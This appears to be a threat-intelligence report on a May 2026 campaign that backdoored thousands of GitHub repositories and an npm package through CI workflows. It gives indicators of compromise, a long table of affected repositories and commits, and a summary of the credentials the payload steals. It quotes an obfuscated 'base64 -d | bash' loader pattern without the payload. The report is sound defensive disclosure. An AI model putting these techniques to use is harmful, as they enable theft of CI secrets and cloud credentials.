Megalodon: Mass GitHub Repo Backdooring via CI Workflows
Table of Contents
TL;DR
On May 18, 2026, an automated campaign codenamed megalodon pushed 5,718 malicious commits to 5,561 GitHub repositories in a six-hour window. Using throwaway accounts and forged author identities (build-bot, auto-ci, ci-bot, pipeline-bot), the attacker injected GitHub Actions workflows containing base64-encoded bash payloads that exfiltrate CI secrets, cloud credentials, SSH keys, OIDC tokens, and source code secrets to a C2 server at 216.126.225.129:8443.
The campaign deployed two payload variants. The mass variant (SysDiag) adds a new workflow triggered on every push and pull request, maximizing automated execution. A targeted variant (Optimize-Build) replaced existing workflows with workflow_dispatch triggers, creating dormant backdoors that the attacker can fire on demand via the GitHub API. The npm package @tiledesk/tiledesk-server versions 2.18.6 through 2.18.12 carry the targeted variant, propagated to npm through routine publishes by the legitimate maintainer from the compromised GitHub repository.
Impact:
- 5,561 GitHub repositories received malicious workflow commits
- Exfiltrates all CI environment variables,
/proc/*/environ, and PID 1 environment - Steals AWS credentials (per-profile access keys, secret keys, session tokens via
awsCLI) - Harvests GCP access tokens via
gcloud auth print-access-token - Queries AWS IMDSv2, GCP metadata, and Azure IMDS endpoints for instance role credentials
- Reads SSH private keys, Docker auth configs,
.npmrc,.netrc, Kubernetes configs, Vault tokens, Terraform credentials, and shell history - Grep-scans source code for 30+ secret regex patterns (API keys, database connection strings, JWTs, PEM private keys, cloud tokens)
- Exfiltrates GitHub Actions OIDC token request URL and token, enabling cloud identity impersonation
- Exfiltrates
GITHUB_TOKEN, GitLab CI/CD tokens, and Bitbucket tokens - Searches the workspace and common server paths for
.envfiles,credentials.json,service-account.json, and other configuration files
Indicators of Compromise (IoC):
- C2:
hxxp://216[.]126[.]225[.]129:8443 - Campaign:
megalodon - Author emails:
[email protected],[email protected] - Author names:
build-bot,auto-ci,ci-bot,pipeline-bot - Commit messages: “ci: add build optimization step”, “build: improve ci performance”, “chore: optimize pipeline runtime”, “chore: sync ci configuration”, “chore: update ci/cd pipeline”, “ci: update build config”, “fix: correct build workflow”
- Mass variant: adds
.github/workflows/ci.ymlnamedSysDiag, triggers onpush(all branches) +pull_request_target - Targeted variant: replaces existing workflow, renames to
Optimize-Build, triggers onworkflow_dispatch - Both variants request permissions:
id-token: write,actions: read - npm:
@tiledesk/tiledesk-serverversions 2.18.6 through 2.18.12 - Tiledesk commit:
acac5a9
Analysis
How We Found It
SafeDep’s Malysis engine flagged @tiledesk/[email protected] after detecting a base64-encoded bash payload inside a bundled GitHub Actions workflow file. The package itself is legitimate: Tiledesk is an open source live chat and chatbot platform, published since 2019 with hundreds of versions and six npm maintainers, all with @tiledesk.com or personal email addresses consistent with the project team.
Diffing version 2.18.12 against the clean 2.18.5, one file changed: .github/workflows/docker-community-worker-push-latest.yml. The original Docker build workflow was gone. In its place, a workflow named Optimize-Build with a set +e; echo "..." | base64 -d | bash one-liner. Application code: identical.
Versions 2.18.6 (May 19) through 2.18.12 (May 21) all carry the backdoor. The same npm account, eljohnny ([email protected]), published both the clean 2.18.5 and the compromised versions. The attacker never touched the npm account. They compromised the GitHub repository, and the maintainer published from the poisoned source without realizing it.
Tracing the Commit
The malicious commit (acac5a9) landed on May 18, 2026, authored by build-bot <[email protected]> with the message “ci: add build optimization step”. The author name and generic noreply email mimic automated CI commits. The GitHub API returns null for both the author and committer user fields: no GitHub account is linked. Someone pushed the commit to master with no PR and no merge commit, using a compromised PAT or deploy key. As of this writing, the malicious commit remains on the master branch.
Searching GitHub for other commits by [email protected] revealed the larger campaign.
Campaign Scale
Searching GitHub for commits authored by [email protected] returns 2,878 results. A second email, [email protected], accounts for another 2,841. All 5,718 commits landed on the same day: May 18, 2026, across a six-hour window from approximately 11:36 to 17:48 UTC, targeting 5,561 distinct repositories.
The attacker rotated through four author names (build-bot, auto-ci, ci-bot, pipeline-bot) and seven commit messages, all mimicking routine CI maintenance:
ci: add build optimization stepbuild: improve ci performancechore: optimize pipeline runtimechore: sync ci configurationchore: update ci/cd pipelineci: update build configfix: correct build workflow
The attacker used throwaway GitHub accounts with random 8-character usernames (e.g., rkb8el9r, bhlru9nr, lo6wt4t6), set git config to forge the author identity, and pushed via compromised PATs or deploy keys.
Tiledesk alone was hit across nine repositories: tiledesk-server, tiledesk-dashboard, tiledesk-telegram-connector, tiledesk-llm, tiledesk-docker-proxy, tiledesk-community-app, tiledesk-campaign-dahboard, tiledesk-helpcenter-template, and tiledesk-ai. Other targeted organizations include Black-Iron-Project (8 repos), WISE-Community, and hundreds of smaller repositories.
The full list of 5,718 malicious commits across 5,561 repositories, collected from GitHub’s commit search API:
| repo | commit_sha | author_name | author_email | date | message | |
|---|---|---|---|---|---|---|
| 1 | batnano/test-action-523509a94620 | 000171d4780a | pipeline-bot | [email protected] | 2026-05-18T15:26:51.000Z | build: improve ci performance |
| 2 | arj1211/sql-practice | 00035298ed2c | build-bot | [email protected] | 2026-05-18T15:41:42.000Z | fix: correct build workflow |
| 3 | Tiledesk/tiledesk-ai | 0003a913d6b1 | ci-bot | [email protected] | 2026-05-18T13:10:40.000Z | chore: update ci/cd pipeline |
| 4 | huyparody/macOS-H81MK-G3250 | 000b106d3897 | ci-bot | [email protected] | 2026-05-18T14:20:24.000Z | ci: add build optimization step |
| 5 | sanjayadhikari009/classic-journey | 001b0f17a3df | auto-ci | [email protected] | 2026-05-18T12:54:24.000Z | build: improve ci performance |
| 6 | marko-petkovic/datac3 | 004412b3714d | build-bot | [email protected] | 2026-05-18T12:37:36.000Z | build: improve ci performance |
| 7 | happyharbor/future-lib | 0044c791a40a | auto-ci | [email protected] | 2026-05-18T14:43:42.000Z | chore: update ci/cd pipeline |
| 8 | Gaucho-Rocket-Project/Bola-Flight-Computer | 004e055477b3 | build-bot | [email protected] | 2026-05-18T13:06:49.000Z | chore: optimize pipeline runtime |
| 9 | Debbatisudheer/MSE-loss-function- | 00679b4c3428 | ci-bot | [email protected] | 2026-05-18T17:44:26.000Z | ci: add build optimization step |
| 10 | AdilameerAdi/indian-client-project | 006bbb681b1d | build-bot | [email protected] | 2026-05-18T12:51:07.000Z | chore: sync ci configuration |
| 11 | Owolabi5541/laravel-blog | 007afa436b5d | pipeline-bot | [email protected] | 2026-05-18T14:01:59.000Z | build: improve ci performance |
| 12 | vrct07/404-Page | 00ac008178a7 | auto-ci | [email protected] | 2026-05-18T14:24:07.000Z | build: improve ci performance |
| 13 | faezepakravan/Android_learning_exercise | 00b81162233d | build-bot | [email protected] | 2026-05-18T13:34:06.000Z | fix: correct build workflow |
| 14 | aurore017/alu-scripting | 00c902eda998 | auto-ci | [email protected] | 2026-05-18T13:28:10.000Z | chore: optimize pipeline runtime |
| 15 | np03cy4a250023-gif/ComputationalMaths | 00e31f723802 | ci-bot | [email protected] | 2026-05-18T13:36:56.000Z | ci: add build optimization step |
| 16 | yashlad27/food-ordering-app | 00e3799ddfe4 | pipeline-bot | [email protected] | 2026-05-18T13:30:25.000Z | build: improve ci performance |
| 17 | huyparody/ef52slk-oc-kitkat-kernel | 00e3a82ba600 | pipeline-bot | [email protected] | 2026-05-18T14:20:09.000Z | chore: sync ci configuration |
| 18 | gliepins/ssh-login-attempt-notifcation-macos | 00eab6bc46a7 | auto-ci | [email protected] | 2026-05-18T16:45:30.000Z | build: improve ci performance |
| 19 | BryanAlexanderSantoso/Academy-Kaze | 00f6059f6979 | build-bot | [email protected] | 2026-05-18T13:49:52.000Z | ci: update build config |
| 20 | Dejlof/book_management_system | 010ad6b1b804 | pipeline-bot | [email protected] | 2026-05-18T15:54:48.000Z | chore: sync ci configuration |
| 21 | mirfanjazuli/053_PBO_Tugas6 | 010e88db86dd | ci-bot | [email protected] | 2026-05-18T16:41:44.000Z | chore: sync ci configuration |
| 22 | BryanAlexanderSantoso/test-action-1779106619711101196 | 011312bf6266 | pipeline-bot | [email protected] | 2026-05-18T13:38:45.000Z | chore: sync ci configuration |
| 23 | azimsidd/QuizApp | 011c51ea9f07 | pipeline-bot | [email protected] | 2026-05-18T13:22:34.000Z | chore: optimize pipeline runtime |
| 24 | Davidf2004/test-action-1778959303666756781 | 0135b85f3ca9 | build-bot | [email protected] | 2026-05-18T17:01:38.000Z | build: improve ci performance |
| 25 | afomkina/test-jenkins-emaple | 014df9175040 | pipeline-bot | [email protected] | 2026-05-18T13:49:21.000Z | build: improve ci performance |
| 26 | aalmonzer/aalmonzer.github.io | 016cd8d2c9a6 | auto-ci | [email protected] | 2026-05-18T12:59:28.000Z | build: improve ci performance |
| 27 | iamroshanpatak/todo-list | 0170c2cccb43 | auto-ci | [email protected] | 2026-05-18T16:30:41.000Z | ci: add build optimization step |
| 28 | yashlad27/TY-Sem2 | 01768085c4fe | auto-ci | [email protected] | 2026-05-18T13:31:09.000Z | chore: sync ci configuration |
| 29 | happyharbor/green-wave | 0176e440526e | auto-ci | [email protected] | 2026-05-18T14:43:08.000Z | fix: correct build workflow |
| 30 | LuanKrzyzaniak/pong-python | 01825b017ab5 | pipeline-bot | [email protected] | 2026-05-18T17:08:10.000Z | chore: update ci/cd pipeline |
| 31 | Sbongslany/job-web | 0197a43bb701 | ci-bot | [email protected] | 2026-05-18T16:30:06.000Z | fix: correct build workflow |
| 32 | Dyybyy/frrgr | 019be7f401fe | build-bot | [email protected] | 2026-05-18T13:26:04.000Z | ci: update build config |
| 33 | tnk1204/teaak.com | 01a80f5f9a46 | ci-bot | [email protected] | 2026-05-18T17:00:24.000Z | chore: update ci/cd pipeline |
| 34 | justin0427/ColorPalette | 01ac946ca3c5 | ci-bot | [email protected] | 2026-05-18T13:10:19.000Z | ci: update build config |
| 35 | ANDREWTENAJEROS/hiram_ios | 01b9541f0178 | ci-bot | [email protected] | 2026-05-18T16:06:24.000Z | chore: sync ci configuration |
| 36 | youneedgreg/notification-system | 01c396e4376c | build-bot | [email protected] | 2026-05-18T13:56:23.000Z | chore: sync ci configuration |
| 37 | summit-webapp-themes/fancy-gold | 01cff9a6976d | auto-ci | [email protected] | 2026-05-18T11:49:57.000Z | chore: sync ci configuration |
| 38 | Skypieee6/clawbot-core | 01dce11e6bc2 | build-bot | [email protected] | 2026-05-18T14:32:46.000Z | chore: optimize pipeline runtime |
| 39 | danhoernchen/metmuseumscroller | 01e828bc1ab2 | auto-ci | [email protected] | 2026-05-18T13:52:44.000Z | fix: correct build workflow |
| 40 | thebenmerlin/GStyl-USD | 01e88c2ca472 | ci-bot | [email protected] | 2026-05-18T12:12:41.000Z | chore: update ci/cd pipeline |
| 41 | shkshakhawat/JavaScript | 01eea139eb51 | auto-ci | [email protected] | 2026-05-18T17:04:19.000Z | chore: sync ci configuration |
| 42 | deploy11/malumotuz | 01f9057dee4e | build-bot | [email protected] | 2026-05-18T11:54:44.000Z | ci: update build config |
| 43 | SanketVerse/Scrappydo | 01fbb934d215 | ci-bot | [email protected] | 2026-05-18T17:19:03.000Z | chore: optimize pipeline runtime |
| 44 | Heseela/BookBazaar | 0206d1454db1 | auto-ci | [email protected] | 2026-05-18T12:12:59.000Z | ci: add build optimization step |
| 45 | l8yh1/eesssss | 0209c70e8609 | auto-ci | [email protected] | 2026-05-18T17:35:00.000Z | ci: add build optimization step |
| 46 | Asultop/oneweb | 021692a6c026 | pipeline-bot | [email protected] | 2026-05-18T12:43:39.000Z | chore: update ci/cd pipeline |
| 47 | deploy11/TodoApi | 021a6f7b0c43 | build-bot | [email protected] | 2026-05-18T11:50:47.000Z | ci: add build optimization step |
| 48 | git-init-priyanshu/zsh-config | 021b7d1a5afa | ci-bot | [email protected] | 2026-05-18T16:59:12.000Z | ci: update build config |
| 49 | b1kaf7/JavaScript | 02326c091396 | pipeline-bot | [email protected] | 2026-05-18T15:28:25.000Z | chore: sync ci configuration |
| 50 | vkuznet/CMSExitCodes | 0233ea858006 | auto-ci | [email protected] | 2026-05-18T13:49:34.000Z | ci: add build optimization step |
| 51 | PyreX00/drf-api | 023628a4ac36 | ci-bot | [email protected] | 2026-05-18T12:04:52.000Z | fix: correct build workflow |
| 52 | rajanyadav80/test-action-1778966162054429330 | 02371743009a | ci-bot | [email protected] | 2026-05-18T13:06:02.000Z | chore: update ci/cd pipeline |
| 53 | BryanAlexanderSantoso/Restfull-API | 023b6417d494 | auto-ci | [email protected] | 2026-05-18T13:51:13.000Z | build: improve ci performance |
| 54 | AmarKumarShaw/svelte_todo_app | 02418ba82c37 | auto-ci | [email protected] | 2026-05-18T12:14:05.000Z | chore: update ci/cd pipeline |
| 55 | oluccasfernandes/sistema-bibliotecario | 024fcd1e183a | pipeline-bot | [email protected] | 2026-05-18T16:05:07.000Z | ci: update build config |
| 56 | HamzaElMkhantar/Mongoose-Checkpoint | 0252decb0509 | auto-ci | [email protected] | 2026-05-18T17:24:12.000Z | ci: update build config |
| 57 | Tiledesk/tiledesk-helpcenter-template | 02541d19ee79 | ci-bot | [email protected] | 2026-05-18T13:15:00.000Z | fix: correct build workflow |
| 58 | mirfanjazuli/notes-app-back-end | 026a4b5a2382 | pipeline-bot | [email protected] | 2026-05-18T16:38:22.000Z | ci: update build config |
| 59 | simonebonusoo/bnsstudio-shopify-theme | 026da9e8b708 | build-bot | [email protected] | 2026-05-18T13:18:00.000Z | chore: sync ci configuration |
| 60 | varunvaghasiya11/Node_js_API_create | 027dbb9de483 | ci-bot | [email protected] | 2026-05-18T13:57:03.000Z | fix: correct build workflow |
| 61 | dongyiqi/trinitiexcel2json | 02834c54ba9b | auto-ci | [email protected] | 2026-05-18T15:10:32.000Z | chore: sync ci configuration |
| 62 | igorKopylov/weather_app | 028f2908ac8b | auto-ci | [email protected] | 2026-05-18T13:24:46.000Z | ci: add build optimization step |
| 63 | HamzaElMkhantar/LinkedIn-clone | 029a460c658d | build-bot | [email protected] | 2026-05-18T17:25:09.000Z | fix: correct build workflow |
| 64 | Davidf2004/test-action-1779100547028636790 | 029f8ccd57d5 | ci-bot | [email protected] | 2026-05-18T16:57:29.000Z | chore: optimize pipeline runtime |
| 65 | jongsun-park/cra-portfolio | 02adee4338ab | build-bot | [email protected] | 2026-05-18T16:20:36.000Z | ci: add build optimization step |
| 66 | thebenmerlin/LITEngine | 02c6ec8387c1 | pipeline-bot | [email protected] | 2026-05-18T12:11:34.000Z | build: improve ci performance |
| 67 | marcusvar/case-dev | 02d8855c1bfd | auto-ci | [email protected] | 2026-05-18T14:19:38.000Z | ci: update build config |
| 68 | REPOSITORIO-PROYECTOS/sistema-quimicos | 02d99cd92e02 | build-bot | [email protected] | 2026-05-18T14:11:36.000Z | chore: optimize pipeline runtime |
| 69 | charanamith/final-review | 02db66a255d8 | pipeline-bot | [email protected] | 2026-05-18T17:04:06.000Z | fix: correct build workflow |
| 70 | pranto2051/Hithub-Profile-Design | 02f1c246f906 | ci-bot | [email protected] | 2026-05-18T14:15:55.000Z | fix: correct build workflow |
| 71 | UniLucca/test | 0304286a62a6 | auto-ci | [email protected] | 2026-05-18T17:06:18.000Z | chore: optimize pipeline runtime |
| 72 | abhinavhello/test-action-1778960691770800809 | 0304d34076bc | ci-bot | [email protected] | 2026-05-18T12:03:12.000Z | chore: update ci/cd pipeline |
| 73 | myssaqil/Kelompok-1-ALRPO-PIZZA-APP | 0307e6195e0b | pipeline-bot | [email protected] | 2026-05-18T14:11:53.000Z | chore: sync ci configuration |
| 74 | Ashwiin/Space-X-Falcon-9-First-Stage-Landing-Prediction | 03085ab00141 | pipeline-bot | [email protected] | 2026-05-18T16:51:37.000Z | ci: add build optimization step |
| 75 | umairabhatti786/test-action-1778960691758917850 | 030d102dabaa | auto-ci | [email protected] | 2026-05-18T12:30:36.000Z | ci: update build config |
| 76 | ABQ4539/fraud-detection-frontend | 0313d4f8925e | auto-ci | [email protected] | 2026-05-18T16:00:21.000Z | build: improve ci performance |
| 77 | svenlabsllc/sling-staging-sandbox | 0326e96a9ad5 | build-bot | [email protected] | 2026-05-18T11:41:08.000Z | chore: sync ci configuration |
| 78 | revel-um/test-action-1779100547319885912 | 0330b70e3170 | pipeline-bot | [email protected] | 2026-05-18T12:01:02.000Z | ci: add build optimization step |
| 79 | SuyeongUeno/Vercel | 033d49198792 | pipeline-bot | [email protected] | 2026-05-18T17:06:44.000Z | chore: optimize pipeline runtime |
| 80 | git-init-priyanshu/Docx-animations | 033e6e934b02 | auto-ci | [email protected] | 2026-05-18T16:59:29.000Z | build: improve ci performance |
| 81 | thebenmerlin/DL-Hackathon | 0348e9ba78be | pipeline-bot | [email protected] | 2026-05-18T12:12:02.000Z | fix: correct build workflow |
| 82 | elenecu/05-NOC | 034964970e13 | build-bot | [email protected] | 2026-05-18T16:08:50.000Z | build: improve ci performance |
| 83 | Akshith809/Netshow | 034be2c7033e | pipeline-bot | [email protected] | 2026-05-18T13:16:08.000Z | chore: sync ci configuration |
| 84 | Tiledesk/tiledesk-nodejs-libs | 03721b61f89b | build-bot | [email protected] | 2026-05-18T12:51:19.000Z | build: improve ci performance |
| 85 | alexmagwe/tictactoe-react | 03917dfe974e | build-bot | [email protected] | 2026-05-18T13:03:36.000Z | ci: update build config |
| 86 | Srj-Love/Product | 0398c05688b0 | ci-bot | [email protected] | 2026-05-18T12:49:38.000Z | ci: update build config |
| 87 | admin-xpertia/arxivtest | 03ab2b0fe8d8 | build-bot | [email protected] | 2026-05-18T11:47:30.000Z | fix: correct build workflow |
| 88 | Princ3k/arifkhan | 03ae22223191 | build-bot | [email protected] | 2026-05-18T13:54:34.000Z | fix: correct build workflow |
| 89 | theabelchannel/Taller-05 | 03e750c1652e | ci-bot | [email protected] | 2026-05-18T13:23:09.000Z | fix: correct build workflow |
| 90 | sahidDev09/Learnica-2.0 | 03ebd65c50b3 | ci-bot | [email protected] | 2026-05-18T16:05:23.000Z | ci: update build config |
| 91 | VietNamCombatZ/carRentalSystem | 03f88fc12cbc | pipeline-bot | [email protected] | 2026-05-18T15:46:15.000Z | fix: correct build workflow |
| 92 | atb9210/trico-rosmarinus | 03f95fdc6a93 | auto-ci | [email protected] | 2026-05-18T13:52:24.000Z | chore: optimize pipeline runtime |
| 93 | Aarabdh13/Gensys | 03ff01cc835e | pipeline-bot | [email protected] | 2026-05-18T13:32:10.000Z | chore: update ci/cd pipeline |
| 94 | theabelchannel/Taller10JUnit | 040960c911e1 | build-bot | [email protected] | 2026-05-18T13:22:51.000Z | chore: sync ci configuration |
| 95 | ayushrudani/FarmerAssistance | 0431fc84272d | ci-bot | [email protected] | 2026-05-18T12:12:01.000Z | fix: correct build workflow |
| 96 | gitfarag/e2e-crud-app | 043661111d3b | build-bot | [email protected] | 2026-05-18T17:26:03.000Z | chore: sync ci configuration |
| 97 | Udbhav-2025/udbhav-ht100ml011 | 044951c92b49 | pipeline-bot | [email protected] | 2026-05-18T13:06:56.000Z | build: improve ci performance |
| 98 | muhammamdsurya/basecamp | 045b9b53cc3e | ci-bot | [email protected] | 2026-05-18T14:11:33.000Z | chore: optimize pipeline runtime |
| 99 | ho-cyber/Comp-Research | 0472bca6e4a8 | ci-bot | [email protected] | 2026-05-18T17:27:12.000Z | fix: correct build workflow |
| 100 | bishaldahal4777/calculator | 04983dc0b3b0 | ci-bot | [email protected] | 2026-05-18T13:29:59.000Z | chore: optimize pipeline runtime |
| 101 | prajwolacharyaa/Password-Strength-Checker | 04a1448ed9a7 | ci-bot | [email protected] | 2026-05-18T13:24:38.000Z | fix: correct build workflow |
| 102 | Shirley940613/hao940613.Github.io- | 04a14ad765d9 | auto-ci | [email protected] | 2026-05-18T13:57:19.000Z | chore: optimize pipeline runtime |
| 103 | Harshit2510745/Authentication-System-2 | 04a3a9648aa0 | ci-bot | [email protected] | 2026-05-18T13:00:12.000Z | chore: sync ci configuration |
| 104 | namktra/13205A-sr | 04a5fc0c296e | build-bot | [email protected] | 2026-05-18T13:58:59.000Z | build: improve ci performance |
| 105 | noullove/hologram | 04ab5109f69b | build-bot | [email protected] | 2026-05-18T12:30:54.000Z | ci: add build optimization step |
| 106 | ENiems/CS-555-Refactor | 04cfbe933584 | auto-ci | [email protected] | 2026-05-18T11:57:10.000Z | chore: sync ci configuration |
| 107 | akashcruz/python-to-do-list | 04d47bbbbf51 | build-bot | [email protected] | 2026-05-18T13:04:24.000Z | ci: add build optimization step |
| 108 | arpita009/ineuron | 04eaaa71514d | auto-ci | [email protected] | 2026-05-18T16:37:16.000Z | chore: sync ci configuration |
| 109 | zarvish/RevenueIQ | 050143150dd0 | auto-ci | [email protected] | 2026-05-18T12:21:25.000Z | ci: update build config |
| 110 | SaiDheeraj-19/Emojis1 | 0505e51d93a1 | pipeline-bot | [email protected] | 2026-05-18T15:46:30.000Z | chore: update ci/cd pipeline |
| 111 | Debbatisudheer/edge-list | 050f3fd89197 | pipeline-bot | [email protected] | 2026-05-18T17:36:31.000Z | build: improve ci performance |
| 112 | IracyMaia/PollinatorSearchGraph | 05229dc08e96 | ci-bot | [email protected] | 2026-05-18T14:08:46.000Z | ci: update build config |
| 113 | Tiledesk/tiledesk-llm | 0530d43d22f0 | auto-ci | [email protected] | 2026-05-18T12:50:47.000Z | chore: sync ci configuration |
| 114 | kayosama007/ci-build-20260329-185840-9741 | 053a906442f6 | ci-bot | [email protected] | 2026-05-18T14:25:31.000Z | chore: sync ci configuration |
| 115 | anshvarma07/NetflixClone | 05409562de98 | auto-ci | [email protected] | 2026-05-18T13:39:43.000Z | chore: optimize pipeline runtime |
| 116 | NicolNonga/ITalk | 054d381167f3 | pipeline-bot | [email protected] | 2026-05-18T12:18:27.000Z | build: improve ci performance |
| 117 | Wang200935/tl | 055417a5fb1c | pipeline-bot | [email protected] | 2026-05-18T13:37:32.000Z | build: improve ci performance |
| 118 | MoustafaElsaghier/MVP_Example | 05762cb8b60f | build-bot | [email protected] | 2026-05-18T15:36:51.000Z | chore: optimize pipeline runtime |
| 119 | lucky-hw-kim/snake-client | 05765b36f685 | build-bot | [email protected] | 2026-05-18T12:44:54.000Z | build: improve ci performance |
| 120 | saradune6/Nutritionist-Generative-AI-Doctor-Using-LLM | 0586acfd8232 | ci-bot | [email protected] | 2026-05-18T13:02:21.000Z | build: improve ci performance |
| 121 | Shirley940613/hao1140613.Github.io | 058de3d6cd8e | build-bot | [email protected] | 2026-05-18T13:57:24.000Z | chore: update ci/cd pipeline |
| 122 | Asultop/AsulFormatString | 05933bb0ce3a | build-bot | [email protected] | 2026-05-18T12:39:56.000Z | ci: update build config |
| 123 | HamzaElMkhantar/movies-App | 05978873f8ca | ci-bot | [email protected] | 2026-05-18T17:26:03.000Z | chore: optimize pipeline runtime |
| 124 | varunvaghasiya11/Day-4-challange | 05a018cf4d39 | ci-bot | [email protected] | 2026-05-18T13:54:39.000Z | build: improve ci performance |
| 125 | Manthankachhadiya/test-action-1778963955661116854 | 05dd2a7dd4b7 | pipeline-bot | [email protected] | 2026-05-18T16:08:06.000Z | build: improve ci performance |
| 126 | DekafTheFirst/deedi-clothings-main | 05e7bc078b75 | auto-ci | [email protected] | 2026-05-18T12:42:38.000Z | chore: sync ci configuration |
| 127 | tnk1204/tocfl | 05fadb622cd3 | ci-bot | [email protected] | 2026-05-18T17:00:43.000Z | build: improve ci performance |
| 128 | AmarKumarShaw/debugverse-helper | 06029e3654d9 | auto-ci | [email protected] | 2026-05-18T12:10:29.000Z | ci: update build config |
| 129 | BryanAlexanderSantoso/D0P4 | 06193506d57b | pipeline-bot | [email protected] | 2026-05-18T13:47:24.000Z | chore: update ci/cd pipeline |
| 130 | kritikhatri/rock-paper-scissors | 0622332cd000 | ci-bot | [email protected] | 2026-05-18T15:35:05.000Z | chore: update ci/cd pipeline |
| 131 | fadexadex/benat20 | 062a20ccaff7 | auto-ci | [email protected] | 2026-05-18T17:40:49.000Z | chore: optimize pipeline runtime |
| 132 | cjustinobi/egry | 062a99e2bc90 | pipeline-bot | [email protected] | 2026-05-18T13:47:51.000Z | build: improve ci performance |
| 133 | nishchalrautela/test-action-1778957958930170912 | 062b7ff2735f | pipeline-bot | [email protected] | 2026-05-18T16:19:25.000Z | ci: update build config |
| 134 | Hatem-Haj-Ismail/test-action-1778960007881134791 | 062bb5b3ff16 | auto-ci | [email protected] | 2026-05-18T12:05:07.000Z | chore: optimize pipeline runtime |
| 135 | NITHIN-NT/First_full_domain_project | 063d452e9e3a | ci-bot | [email protected] | 2026-05-18T13:24:36.000Z | fix: correct build workflow |
| 136 | MTGrubbs/test-action-1779106619710428093 | 0646f121a135 | auto-ci | [email protected] | 2026-05-18T13:55:04.000Z | ci: add build optimization step |
| 137 | just-abdullah-dev/Week4Assignment | 064d6008f654 | auto-ci | [email protected] | 2026-05-18T13:59:26.000Z | fix: correct build workflow |
| 138 | ThaSha99/Frontend-Online-Course-Platform | 0683566e20f9 | build-bot | [email protected] | 2026-05-18T13:06:36.000Z | ci: add build optimization step |
| 139 | tuantrinitri/vi_tts | 068879b5b0ae | auto-ci | [email protected] | 2026-05-18T16:25:29.000Z | ci: add build optimization step |
| 140 | AmanWorku/Try-Rails | 068a7384939b | pipeline-bot | [email protected] | 2026-05-18T12:26:55.000Z | chore: sync ci configuration |
| 141 | IsidurPaine/Codici-Sistema-IoT | 06924be521a6 | build-bot | [email protected] | 2026-05-18T12:51:47.000Z | fix: correct build workflow |
| 142 | jsged/discord-image-logger | 0699ea89c3c3 | build-bot | [email protected] | 2026-05-18T17:13:05.000Z | chore: optimize pipeline runtime |
| 143 | rahulj004/War-Card-Game-iOS-app-using-swift | 069f567cfff3 | ci-bot | [email protected] | 2026-05-18T15:58:42.000Z | chore: update ci/cd pipeline |
| 144 | Sbongslany/credit_card_validator | 06a2713cd09c | build-bot | [email protected] | 2026-05-18T16:28:32.000Z | chore: optimize pipeline runtime |
| 145 | expexpert/sosglobal | 06a2afb99f97 | ci-bot | [email protected] | 2026-05-18T12:16:56.000Z | ci: add build optimization step |
| 146 | Fablelie/Prototype-DiceGame | 06c351ff929d | ci-bot | [email protected] | 2026-05-18T17:10:16.000Z | ci: update build config |
| 147 | unbankedgroup/arca-site | 06c7fa7609ce | ci-bot | [email protected] | 2026-05-18T11:47:47.000Z | build: improve ci performance |
| 148 | Akshith809/test-action-1779100547029804969 | 06cb053df066 | ci-bot | [email protected] | 2026-05-18T13:11:02.000Z | ci: add build optimization step |
| 149 | noushiFlex/simplePasswordGeneratorV1 | 06db8b6a79ba | auto-ci | [email protected] | 2026-05-18T17:47:09.000Z | fix: correct build workflow |
| 150 | zaunere/sync2s3 | 06dc61ddda8c | auto-ci | [email protected] | 2026-05-18T13:25:30.000Z | chore: optimize pipeline runtime |
| 151 | Mostakim0978/ingame | 06dcf945d532 | auto-ci | [email protected] | 2026-05-18T11:45:56.000Z | fix: correct build workflow |
| 152 | roydellclarke/dibu2z.nft | 06e773aef86d | build-bot | [email protected] | 2026-05-18T13:03:05.000Z | chore: sync ci configuration |
| 153 | sakshi1013-coder/Git | 06f7a7bbdc06 | ci-bot | [email protected] | 2026-05-18T12:27:23.000Z | fix: correct build workflow |
| 154 | Ashwiin/yFinance | 0709a654dbb5 | pipeline-bot | [email protected] | 2026-05-18T16:55:53.000Z | build: improve ci performance |
| 155 | Owolabi5541/backend-assessment | 0713b8a6fae5 | build-bot | [email protected] | 2026-05-18T13:55:16.000Z | build: improve ci performance |
| 156 | Kevin-max-design/assignment | 071742424567 | ci-bot | [email protected] | 2026-05-18T16:46:33.000Z | ci: update build config |
| 157 | HarshAgnihotri9/HarshAgnihotri9 | 072cd11a05be | pipeline-bot | [email protected] | 2026-05-18T12:17:23.000Z | ci: update build config |
| 158 | vahitkeskin/Equatix | 07326137debe | auto-ci | [email protected] | 2026-05-18T13:21:02.000Z | chore: sync ci configuration |
| 159 | amitos80/store | 07370b0af7d4 | build-bot | [email protected] | 2026-05-18T13:51:42.000Z | ci: update build config |
| 160 | hahaha-zsq/winter-i18n-spring-boot-starter | 073d9e16f41e | build-bot | [email protected] | 2026-05-18T12:13:34.000Z | fix: correct build workflow |
| 161 | ammadey7/hello.ahmed | 073fe502817f | pipeline-bot | [email protected] | 2026-05-18T13:14:02.000Z | fix: correct build workflow |
| 162 | NikAr0702/recipe_app_new | 0746103ff178 | auto-ci | [email protected] | 2026-05-18T12:13:12.000Z | chore: update ci/cd pipeline |
| 163 | anantd16/HTML-CSS | 075135d02443 | ci-bot | [email protected] | 2026-05-18T14:00:11.000Z | ci: add build optimization step |
| 164 | anshvarma07/Data-Structure-Imp-Code | 075ab050aa2e | auto-ci | [email protected] | 2026-05-18T13:37:35.000Z | chore: optimize pipeline runtime |
| 165 | FRA-NCE-IES/NACIT- | 0780fefcd2fb | auto-ci | [email protected] | 2026-05-18T16:28:14.000Z | ci: update build config |
| 166 | XinyiC23/gitPractice | 0791b752ebd1 | build-bot | [email protected] | 2026-05-18T16:40:56.000Z | build: improve ci performance |
| 167 | LuciferVid/LuciferVid | 07a0fdeabc7b | ci-bot | [email protected] | 2026-05-18T11:59:56.000Z | chore: optimize pipeline runtime |
| 168 | hahaha-zsq/dadandiaoming-cli | 07a27bea77d2 | ci-bot | [email protected] | 2026-05-18T12:19:18.000Z | chore: update ci/cd pipeline |
| 169 | raffaelramalhorosa/days-in-carmine | 07ae331c9dde | build-bot | [email protected] | 2026-05-18T12:07:55.000Z | ci: add build optimization step |
| 170 | Prajwal247/hotel | 07b5ee9bb89c | build-bot | [email protected] | 2026-05-18T13:17:21.000Z | chore: update ci/cd pipeline |
| 171 | TheoVasa/virtual_reality | 07cbd2ffa373 | pipeline-bot | [email protected] | 2026-05-18T14:00:07.000Z | fix: correct build workflow |
| 172 | rabiiiii18/To-Do-list | 07cfe63c1efa | pipeline-bot | [email protected] | 2026-05-18T16:13:46.000Z | chore: update ci/cd pipeline |
| 173 | deploy11/egoya | 07d67ec3c454 | auto-ci | [email protected] | 2026-05-18T11:51:28.000Z | build: improve ci performance |
